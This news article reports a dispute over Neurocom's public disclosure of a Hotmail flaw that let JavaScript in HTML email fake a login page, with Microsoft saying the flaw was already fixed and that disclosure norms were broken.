Security firm pulls Hotmail hole report
The Canadian company drops allegations of a vulnerability in the Web-based e-mail service, saying the problem had been fixed weeks before.
The exploit was described on the Bugtraq security mailing list Jan. 26 and was repaired within days, according to Microsoft's security response team. Microsoft on Friday said that security firm Neurocom had violated standard bug-reporting protocols by going public with the alleged vulnerability on Wednesday before contacting the company's security team.
"Our purpose was not to punish Microsoft at all," said Cyril Simonnet, an executive at Neurocom's Canada division. "Our purpose is just to find security breaches."
Neurocom issued the warning over a security hole involving a malicious program known as a Trojan horse, which passes itself off as another application. In this case, potential hackers could use the Trojan horse, written in HTML (Hypertext Markup Language), to create a "perfect replica" of Hotmail's re-login page, according to Neurocom.
The company said that other sites providing Web-based e-mail may also be vulnerable to a similar attack.
"It's a new instance of an old problem," said Elias Levy, chief technology officer for SecurityFocus.com. "It's another way to get past those filters, and it's probably not going to be the last."
Scott Culp, a program manager with Microsoft's Security Response Center, said he is not sure why Neurocom did not contact Microsoft before issuing its statement this week.
"Most people in the security industry follow a code of conduct in which they give the vendor notice of anything that they believe affects that vendor's product," he said.
Neurocom said filters have been incorporated to limit the use of certain HTML or JavaScript code that potentially threatens security. For example, in 1998, Microsoft implemented a filter to plug JavaScript security holes.
However, Neurocom said in a statement that "the breaches in question come from omissions in the conception of these filters" and that the procedure to hack into an e-mail system "is relatively simple and requires very little technical knowledge."
A Trojan horse using JavaScript sent within an HTML message could trick Web-based e-mail users into handing over usernames and passwords. JavaScript, a Web scripting language developed by Netscape Communications, executes actions on a Web page without user input. The language is commonly used for launching pop-up windows or scrolling text.
SecurityFocus' Levy said a malicious person could take a Trojan horse using JavaScript to create a window that looks like a sign-in page. An e-mail user then would be fooled into entering a username and password, which the malicious person could obtain.
Microsoft and other companies that use Web-based e-mail systems commonly try to filter known ways to insert malicious JavaScript code or problems, according to Levy. He said that instead of taking this approach, it would be best to allow only known good content. That way, when new methods to encode JavaScript are used, they're still protected.